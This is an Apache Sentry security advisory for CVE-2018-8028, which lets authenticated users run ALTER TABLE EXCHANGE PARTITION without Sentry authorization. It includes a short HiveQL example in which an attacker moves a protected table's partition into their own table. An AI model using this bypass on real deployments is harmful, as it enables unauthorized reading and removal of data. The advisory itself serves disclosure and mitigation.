[SECURITY] CVE-2018-8028: Bypass ALTER TABLE EXCHANGE PARTITIONS authorization for Hive

[Sergio Peña <sp...@gmail.com>]

[SECURITY] CVE-2018-8028: Bypass ALTER TABLE EXCHANGE PARTITIONS
authorization for Hive

Severity:
Major

Vendor:
The Apache Software Foundation

Versions Affected:
This vulnerability affects only the version of Apache Sentry 2.0.0 due to
the introduction of
Hive 2.x.

Description:
An authenticated user can execute ALTER TABLE EXCHANGE PARTITIONS without
being authorized by Sentry.
This can allow an attacker unauthorized access to the partitioned data of a
Sentry protected table and can allow
an attacker to remove data from a Sentry protected table.

Mitigation:
Apache Sentry users using 2.0.0 should upgrade to 2.0.1 or later.

Example:
The admin has created the following table in a database that the attacker
doesn't have access to:
> CREATE TABLE target_database1.aliens (name string) PARTITIONED BY
(home_planet string, diet string);
> ALTER TABLE target_database1.aliens ADD PARTITION (home_planet='earth',
diet='milk shakes');
> ALTER TABLE target_database1.aliens ADD PARTITION
(home_planet='trapis-4', diet='sentient lifeforms with cheese');

The attacker has a database attacker_database, created as follows:
> CREATE TABLE attacker_database.data_stealer (name string) PARTITIONED BY
(home_planet string, diet string);
> ALTER TABLE attacker_database.data_stealer EXCHANGE PARTITION
(home_planet='earth', diet='milk shakes')
   WITH TABLE target_database1.aliens;

The attacker now has access to all of the data in the target partitions
with the privileges available to them on attacker_database.

Credit:
This issue was discovered by Benjamin Iglauer of Cloudera.

References:
https://cwiki.apache.org/confluence/display/SENTRY/Vulnerabilities+found+in+Apache+Sentry